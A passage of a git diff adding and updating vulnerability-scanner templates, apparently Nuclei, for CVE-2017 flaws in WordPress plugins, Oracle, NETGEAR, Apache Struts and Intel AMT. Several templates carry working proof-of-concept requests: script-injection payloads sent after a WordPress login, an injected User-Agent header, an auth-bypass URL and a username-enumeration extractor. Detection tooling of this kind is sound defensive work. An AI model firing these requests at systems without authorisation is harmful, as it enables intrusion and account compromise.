- 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Maps by BestWebSoft")' + condition: and + +# digest: 4a0a004730450221008271d6934342ad330b07d227c40ff953eb4411dc8f6984991318bc2a6a352a52022078e204959bf57e4da15ef09a37b43c7890cd87569f86abce3b9b73ecaef71888:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml new file mode 100644 index 0000000000..44cf2d6705 --- /dev/null +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18558 + +info: + name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18558 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558 + - https://wordpress.org/plugins/bws-testimonials/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18558 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: testimonials + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-testimonials/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Testimonials by BestWebSoft")' + condition: and + +# digest: 4a0a004730450220084a00ef0d61dfcb2788fc3535e2c6d87eab2212f9edd6a153577d8ab493823d022100b26b73611f8a38b1a6094ce30e81e79ac8b0e008de2deebd6000e02fd4a0b0fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml new file mode 100644 index 0000000000..b8a3a29acf --- /dev/null +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18562 + +info: + name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18562 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18562 + - https://wordpress.org/plugins/error-log-viewer/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18562 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: error_log_viewer + framework: wordpress + publicwww-query: "/wp-content/plugins/error-log-viewer/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Error Log Viewer by BestWebSoft")' + condition: and + +# digest: 4a0a00473045022100c60b794b3253da9cd3b26f889c57f11379e802ab8ba8b70f744d8b0a15b1b4cb022029257edbf90887974d72eb27992c0e639b76497236574da254dddcfdb8079e07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml new file mode 100644 index 0000000000..a338888664 --- /dev/null +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18564 + +info: + name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The sender plugin before 1.2.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18564 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564 + - https://wordpress.org/plugins/sender/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18564 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: sender + framework: wordpress + publicwww-query: "/wp-content/plugins/sender/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/sender/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Sender by BestWebSoft")' + condition: and + +# digest: 4b0a00483046022100cba2d808cffd3b0aea67b19b2fc409895b624e37603f736b7db5fd736d1aefcc02210096f0fcab294f51bb6fa791ea7dd53eb857ed550a549cd38bed74a1eca6ff32ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml new file mode 100644 index 0000000000..f614c97a9c --- /dev/null +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18565 + +info: + name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The updater plugin before 1.35 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18565 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565 + - https://wordpress.org/plugins/updater/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18565 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: updater + framework: wordpress + publicwww-query: "/wp-content/plugins/updater/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/updater/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Updater by BestWebSoft")' + condition: and + +# digest: 4a0a0047304502200cdbd61e72973e0ed9c9763710ada7251191d116b8d637f790a04b5c3e9acb6b022100fa7f096b404bba49bcb157fffa331a28a138dcb5327f48037c6bbebb87bbbcad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml new file mode 100644 index 0000000000..8c311ab7ec --- /dev/null +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18566 + +info: + name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The user-role plugin before 1.5.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18566 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18566 + - https://wordpress.org/plugins/user-role/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18566 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: user_role + framework: wordpress + publicwww-query: "/wp-content/plugins/user-role/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/user-role/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "User Role by BestWebSoft")' + condition: and + +# digest: 4a0a00473045022100d64304307bb57e5f39a7042742ae7ebb740c991f9693e1cf846f4d373a40b08b02207ec0521522d28db6a427a244b2a1f1684fdabbc896fe3e165c6de19f2dc737ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 3bfe582f5f..01df60967f 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: medium description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + remediation: | + Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/8934 - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 @@ -15,11 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:*:*:* epss-score: 0.00094 - tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss + epss-percentile: 0.39394 + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: designmodo + product: qards + framework: wordpress + tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss http: - method: GET @@ -38,4 +44,4 @@ http: words: - "console.log" -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502203f1d0dfa12bb5cbb5ef63a98ac5703f21ead55757f054c252c3a8f65c79e3f5a022100b2d43e44bbc94f8d18cd57fdda5f6aa57af77e9bc7e25d6d819c897e3c4a18c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 9b49688795..e833e2ebeb 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -6,21 +6,27 @@ info: severity: high description: | Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + remediation: | + Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches. reference: - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + - https://github.com/graphite-project/graphite-web/pull/2499 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 + epss-score: 0.00902 + epss-percentile: 0.80951 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* - epss-score: 0.00639 - tags: cve,cve2017,graphite,ssrf,oast metadata: max-request: 1 + vendor: graphite_project + product: graphite + tags: cve,cve2017,graphite,ssrf,oast http: - method: GET @@ -33,4 +39,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/19 +# digest: 490a0046304402205de4f871a73b41a877f5e6fc42459f3243a56bebd15fd3a476697a0d5ca2d55102207481d9570b2ec6b31a062b917ec7300122915fb77cea2ee1fcda46834be4bc0b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 684bb51560..620df82f6d 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -5,18 +5,25 @@ info: author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/ + - http://www.securitytracker.com/id/1038296 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle + epss-score: 0.96927 + epss-percentile: 0.99625 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle http: - raw: @@ -45,8 +52,8 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/04/20 +# digest: 4a0a0047304502201c325940a7b2d060181262c83d84ed73937d009736d384542fd347e8d2c4727b02210096117999e51a1c98dae96f866c2abe8cb712c1e23ff48fad4100d39d0cc98f4c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 4ce615dc71..0179355a08 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -5,19 +5,27 @@ info: author: 0x_Akoko severity: medium description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability. reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://www.securitytracker.com/id/1038299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - tags: oracle,redirect,edb,cve,cve2017 + epss-score: 0.00865 + epss-percentile: 0.80489 + cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: applications_framework + tags: oracle,redirect,edb,cve,cve2017 http: - method: GET @@ -26,8 +34,8 @@ http: matchers: - type: word + part: body words: - 'noresize src="/\interact.sh?configName=' - part: body -# Enhanced by mp on 2022/04/14 +# digest: 490a00463044022028b08411814694d1ee0598d68196504a8ac42bdfdee04aba050f4bb204c83fa802207bd6e815893549b379706a9b0a6a4963d49e60b8bd8516ca4400eda78ace6196:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index baf4d6e401..c7d7fa7e6e 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -5,23 +5,32 @@ info: author: geeknik severity: medium description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. + remediation: | + Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability. reference: - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://nvd.nist.gov/vuln/detail/CVE-2017-4011 + - http://www.securitytracker.com/id/1038523 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-4011 cwe-id: CWE-79 - tags: cve,cve2017,mcafee,xss + epss-score: 0.00142 + epss-percentile: 0.49784 + cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: network_data_loss_prevention + tags: cve,cve2017,mcafee,xss http: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// @@ -37,4 +46,4 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 +# digest: 490a004630440220513842a1f7ebcf19628ea30647dd5784c645598c601459f39a6bad0c91b578b8022006afe68eef8bd1c5c124472ae4e145525959513a3dbea205fde86d004e3e0542:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 0a3b332aad..4276f8f603 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -5,20 +5,28 @@ info: author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. + remediation: | + Update WordPress to version 4.7.1 or later reference: - https://www.exploit-db.com/exploits/41497 - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - http://www.openwall.com/lists/oss-security/2017/01/14/6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 + epss-score: 0.97179 + epss-percentile: 0.99742 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.component:"WordPress" verified: true + max-request: 2 + vendor: wordpress + product: wordpress + shodan-query: http.component:"WordPress" tags: cve,cve2017,wordpress,wp,edb http: @@ -28,9 +36,9 @@ http: - "{{BaseURL}}/?rest_route=/wp/v2/users/" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -50,10 +58,10 @@ http: extractors: - type: json - part: body name: "usernames" json: - '.[] | .slug' - '.[].name' + part: body -# Enhanced by md on 2023/01/30 +# digest: 4b0a00483046022100b1a63d700bc6d227f78ed346d95cb85318c9583cc3b8e7c0e468b6be388e4af7022100c270616f5ec774343eaed385a32b8bf08e14f5691bc660bf384c520dbc896577:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index d5efeff60d..143ef8b7c6 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -6,24 +6,31 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 + - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear,router,kev + epss-score: 0.97402 + epss-percentile: 0.99897 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: r6200_firmware + tags: cve,cve2017,auth-bypass,netgear,router,kev http: - method: GET path: - - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" + - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}" matchers-condition: and matchers: @@ -38,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a0047304502207ea73c5f26b077f09fbe8d6e928efb47afe01fe8d5744571cc56f188865aede8022100a32e3525ce5fc9ce74298b9e8c4bac52a04ec0329cf2bf17cd4df7dd428d2f50:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 2ab385eaac..df72e2150f 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - https://www.openbugbounty.org/incidents/228262/ - https://www.exploit-db.com/exploits/42042/ @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: edb,cve,cve2017,xss,caseaware + epss-score: 0.00286 + epss-percentile: 0.65223 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: edb,cve,cve2017,xss,caseaware http: - method: GET @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502210081ebdb8965cb8aeb119418238e5149c3a21d7c9938ba5202caaac288554e588102206094c3cf4ed8b3301835d4770c041ba4f427177452642f3587973bed0398cc66:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index dc201eb144..2195b0ed79 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -6,20 +6,28 @@ info: severity: critical description: | Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string. + remediation: | + Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches. reference: - https://github.com/mazen160/struts-pwn - https://isc.sans.edu/diary/22169 - https://github.com/rapid7/metasploit-framework/issues/8064 - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 + - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 + epss-score: 0.97554 + epss-percentile: 0.99994 + cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Apache Struts" verified: true + max-request: 1 + vendor: apache + product: struts + shodan-query: html:"Apache Struts" tags: cve,cve2017,apache,kev,msf,struts,rce http: @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by md on 2023/03/21 +# digest: 4a0a00473045022100bcb66416c0188ab58cf239eb531f919c6bd33db745d31bb47bb3ed9b3a643fa102207e38cb497579fe44a3c0b67f3be0f305d4d34c8cc7c7a163680c3c1a52434a27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 739b9c922f..fa3dda9f9a 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + remediation: | + Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. reference: - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability @@ -16,12 +18,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 - cpe: cpe:2.3:o:intel:active_management_technology_firmware:*:*:*:*:*:*:*:* - epss-score: 0.9746 + epss-score: 0.97416 + epss-percentile: 0.99907 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"Active Management Technology" verified: true + max-request: 2 + vendor: intel + product: active_management_technology_firmware + shodan-query: title:"Active Management Technology" tags: cve,cve2017,amt,intel,tenable,kev http: @@ -29,13 +34,13 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /hw-sys.htm HTTP/1.1 Host: {{Hostname}} - digest-username: admin req-condition: true + digest-username: admin + matchers-condition: and matchers: - type: word @@ -49,4 +54,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/03 +# digest: 4b0a00483046022100bf6a21e3c6608674da08a2ab6162e32b3fb936065099bafe46dd6c78146b5b01022100fe94ba062f98e83b20251618a80393e80769a9970fa8043095e885e225fc40bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index a9c26d89a5..a59db0e158 100644 